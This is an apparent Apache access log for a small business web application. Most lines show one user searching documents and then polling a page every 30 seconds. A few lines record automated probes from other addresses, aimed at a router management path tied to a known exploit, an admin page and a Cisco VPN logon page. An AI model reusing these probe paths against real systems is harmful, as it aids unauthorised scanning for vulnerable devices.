178.115.42.220 - - [26/Nov/2024:12:46:27 +0100] "GET /entry.php?id=10676&&title=Belegsuche HTTP/1.1" 200 1391 "http://hausegger.activities.at/entry.php?id=11237&type=10668" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:12:46:28 +0100] "GET /gui/javascript/form_bu_document_workflow.js?1732621588 HTTP/1.1" 200 4900 "http://hausegger.activities.at/entry.php?id=11239&mode=document&form=10668&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:12:46:28 +0100] "GET /gui/javascript/form_form.js?1732621588 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=11239&mode=document&form=10668&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:12:46:28 +0100] "GET /gui/javascript/form_form.js?1732621588 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10676&&title=Belegsuche" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:12:46:27 +0100] "GET /entry.php?id=11240&mode=document&form=10668& HTTP/1.1" 200 2673 "http://hausegger.activities.at/entry.php?id=11237&type=10668" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:12:46:27 +0100] "GET /entry.php?id=11238&mode=document&form=10668& HTTP/1.1" 200 3241 "http://hausegger.activities.at/entry.php?id=11237&type=10668" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:12:46:28 +0100] "GET /entry.php?id=10776&form=11066&name=list& HTTP/1.1" 200 1515 "http://hausegger.activities.at/entry.php?id=11240&mode=document&form=10668&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:12:46:28 +0100] "GET /entry.php?id=10778&form=11066&name=list& HTTP/1.1" 200 2588 "http://hausegger.activities.at/entry.php?id=11240&mode=document&form=10668&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:12:46:28 +0100] "POST /entry.php?id=11240 HTTP/1.1" 200 2673 "http://hausegger.activities.at/entry.php?id=11240&mode=document&form=10668&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:12:46:29 +0100] "GET /gui/javascript/form_bu_document_workflow.js?1732621589 HTTP/1.1" 200 4900 "http://hausegger.activities.at/entry.php?id=11240" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:12:46:29 +0100] "GET /gui/javascript/form_form.js?1732621589 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=11240" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:12:46:29 +0100] "GET /entry.php?id=10776&form=11066&name=list& HTTP/1.1" 200 1515 "http://hausegger.activities.at/entry.php?id=11240" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:12:46:29 +0100] "GET /entry.php?id=10778&form=11066&name=list& HTTP/1.1" 200 2574 "http://hausegger.activities.at/entry.php?id=11240" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:12:46:31 +0100] "GET /entry.php?id=10828 HTTP/1.1" 200 9144 "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:12:46:31 +0100] "GET /gui/javascript/form_form.js?1732621591 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10828" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:12:46:31 +0100] "GET /entry.php?id=10889&document_id=& HTTP/1.1" 200 1509 "http://hausegger.activities.at/entry.php?id=10828" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:12:46:34 +0100] "GET /entry.php?id=10271&&ser=621534 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=621474" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:12:46:34 +0100] "GET /gui/javascript/form_form.js?1732621594 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=621534" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
141.98.11.48 - - [26/Nov/2024:12:47:06 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 371 "-" "Hello"
178.115.42.220 - - [26/Nov/2024:12:47:08 +0100] "GET /entry.php?id=10271&&ser=621568 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=621507" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:12:47:08 +0100] "GET /gui/javascript/form_form.js?1732621628 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=621568" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:12:47:36 +0100] "GET /entry.php?id=10271&&ser=621594 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=621534" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:12:47:36 +0100] "GET /gui/javascript/form_form.js?1732621656 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=621594" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:12:48:09 +0100] "GET /entry.php?id=10271&&ser=621628 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=621568" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:12:48:09 +0100] "GET /gui/javascript/form_form.js?1732621689 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=621628" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:12:48:36 +0100] "GET /entry.php?id=10271&&ser=621656 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=621594" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:12:48:36 +0100] "GET /gui/javascript/form_form.js?1732621716 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=621656" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
156.59.198.136 - - [26/Nov/2024:12:48:41 +0100] "GET /renault.activities.at/htdocs/binaries/10267451.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.115.42.220 - - [26/Nov/2024:12:49:09 +0100] "GET /entry.php?id=10271&&ser=621689 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=621628" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:12:49:09 +0100] "GET /gui/javascript/form_form.js?1732621749 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=621689" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:12:49:36 +0100] "GET /entry.php?id=10271&&ser=621716 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=621656" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:12:49:36 +0100] "GET /gui/javascript/form_form.js?1732621776 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=621716" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
18.130.68.15 - - [26/Nov/2024:12:49:39 +0100] "\x16\x03\x01" 400 383 "-" "-"
178.115.42.220 - - [26/Nov/2024:12:50:09 +0100] "GET /entry.php?id=10271&&ser=621749 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=621689" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:12:50:09 +0100] "GET /gui/javascript/form_form.js?1732621809 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=621749" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:12:50:36 +0100] "GET /entry.php?id=10271&&ser=621776 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=621716" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:12:50:37 +0100] "GET /gui/javascript/form_form.js?1732621836 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=621776" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:12:51:10 +0100] "GET /entry.php?id=10271&&ser=621809 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=621749" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:12:51:10 +0100] "GET /gui/javascript/form_form.js?1732621870 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=621809" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
95.214.53.202 - - [26/Nov/2024:12:51:32 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
178.115.42.220 - - [26/Nov/2024:12:51:38 +0100] "GET /entry.php?id=10271&&ser=621836 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=621776" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:12:51:38 +0100] "GET /gui/javascript/form_form.js?1732621898 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=621836" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
18.130.68.15 - - [26/Nov/2024:12:52:03 +0100] "GET /admin/index.html HTTP/1.1" 404 287 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
178.115.42.220 - - [26/Nov/2024:12:52:10 +0100] "GET /entry.php?id=10271&&ser=621870 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=621809" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:12:52:10 +0100] "GET /gui/javascript/form_form.js?1732621930 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=621870" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:12:52:39 +0100] "GET /entry.php?id=10271&&ser=621898 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=621836" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:12:52:39 +0100] "GET /gui/javascript/form_form.js?1732621959 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=621898" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:12:53:10 +0100] "GET /entry.php?id=10271&&ser=621930 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=621870" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:12:53:10 +0100] "GET /gui/javascript/form_form.js?1732621990 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=621930" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:12:53:39 +0100] "GET /entry.php?id=10271&&ser=621959 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=621898" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:12:53:39 +0100] "GET /gui/javascript/form_form.js?1732622019 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=621959" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:12:54:11 +0100] "GET /entry.php?id=10271&&ser=621990 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=621930" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:12:54:11 +0100] "GET /gui/javascript/form_form.js?1732622051 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=621990" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:12:54:39 +0100] "GET /entry.php?id=10271&&ser=622019 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=621959" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:12:54:39 +0100] "GET /gui/javascript/form_form.js?1732622079 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=622019" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:12:55:11 +0100] "GET /entry.php?id=10271&&ser=622051 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=621990" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:12:55:11 +0100] "GET /gui/javascript/form_form.js?1732622111 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=622051" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:12:55:39 +0100] "GET /entry.php?id=10271&&ser=622079 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=622019" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:12:55:40 +0100] "GET /gui/javascript/form_form.js?1732622140 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=622079" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:12:56:11 +0100] "GET /entry.php?id=10271&&ser=622111 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=622051" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:12:56:11 +0100] "GET /gui/javascript/form_form.js?1732622171 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=622111" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
18.130.68.15 - - [26/Nov/2024:12:56:15 +0100] "\x16\x03\x01" 400 383 "-" "-"
178.115.42.220 - - [26/Nov/2024:12:56:40 +0100] "GET /entry.php?id=10271&&ser=622140 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=622079" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:12:56:40 +0100] "GET /gui/javascript/form_form.js?1732622200 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=622140" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:12:57:12 +0100] "GET /entry.php?id=10271&&ser=622171 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=622111" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:12:57:12 +0100] "GET /gui/javascript/form_form.js?1732622232 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=622171" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:12:57:40 +0100] "GET /entry.php?id=10271&&ser=622200 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=622140" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:12:57:40 +0100] "GET /gui/javascript/form_form.js?1732622260 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=622200" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:12:58:12 +0100] "GET /entry.php?id=10271&&ser=622232 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=622171" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:12:58:12 +0100] "GET /gui/javascript/form_form.js?1732622292 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=622232" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:12:58:40 +0100] "GET /entry.php?id=10271&&ser=622260 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=622200" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:12:58:40 +0100] "GET /gui/javascript/form_form.js?1732622320 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=622260" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:12:59:12 +0100] "GET /entry.php?id=10271&&ser=622292 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=622232" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:12:59:13 +0100] "GET /gui/javascript/form_form.js?1732622353 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=622292" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:12:59:41 +0100] "GET /entry.php?id=10271&&ser=622320 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=622260" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:12:59:41 +0100] "GET /gui/javascript/form_form.js?1732622381 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=622320" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:00:13 +0100] "GET /entry.php?id=10271&&ser=622353 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=622292" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:00:13 +0100] "GET /gui/javascript/form_form.js?1732622413 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=622353" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:00:41 +0100] "GET /entry.php?id=10271&&ser=622381 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=622320" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:00:41 +0100] "GET /gui/javascript/form_form.js?1732622441 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=622381" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:01:13 +0100] "GET /entry.php?id=10271&&ser=622413 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=622353" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:01:13 +0100] "GET /gui/javascript/form_form.js?1732622473 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=622413" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:01:41 +0100] "GET /entry.php?id=10271&&ser=622441 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=622381" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:01:41 +0100] "GET /gui/javascript/form_form.js?1732622501 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=622441" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:02:14 +0100] "GET /entry.php?id=10271&&ser=622473 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=622413" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:02:14 +0100] "GET /gui/javascript/form_form.js?1732622534 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=622473" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:02:41 +0100] "GET /entry.php?id=10271&&ser=622501 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=622441" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:02:42 +0100] "GET /gui/javascript/form_form.js?1732622562 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=622501" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
18.130.68.15 - - [26/Nov/2024:13:03:06 +0100] "\x16\x03\x01" 400 383 "-" "-"
178.115.42.220 - - [26/Nov/2024:13:03:14 +0100] "GET /entry.php?id=10271&&ser=622534 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=622473" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:03:14 +0100] "GET /gui/javascript/form_form.js?1732622594 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=622534" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:03:42 +0100] "GET /entry.php?id=10271&&ser=622562 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=622501" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:03:42 +0100] "GET /gui/javascript/form_form.js?1732622622 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=622562" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:04:14 +0100] "GET /entry.php?id=10271&&ser=622594 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=622534" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:04:14 +0100] "GET /gui/javascript/form_form.js?1732622654 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=622594" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:04:42 +0100] "GET /entry.php?id=10271&&ser=622622 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=622562" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:04:42 +0100] "GET /gui/javascript/form_form.js?1732622682 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=622622" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:05:15 +0100] "GET /entry.php?id=10271&&ser=622654 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=622594" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:05:15 +0100] "GET /gui/javascript/form_form.js?1732622715 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=622654" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
18.130.68.15 - - [26/Nov/2024:13:05:20 +0100] "GET /+CSCOE+/logon.html HTTP/1.1" 404 290 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
178.115.42.220 - - [26/Nov/2024:13:05:42 +0100] "GET /entry.php?id=10271&&ser=622682 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=622622" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:05:42 +0100] "GET /gui/javascript/form_form.js?1732622742 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=622682" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
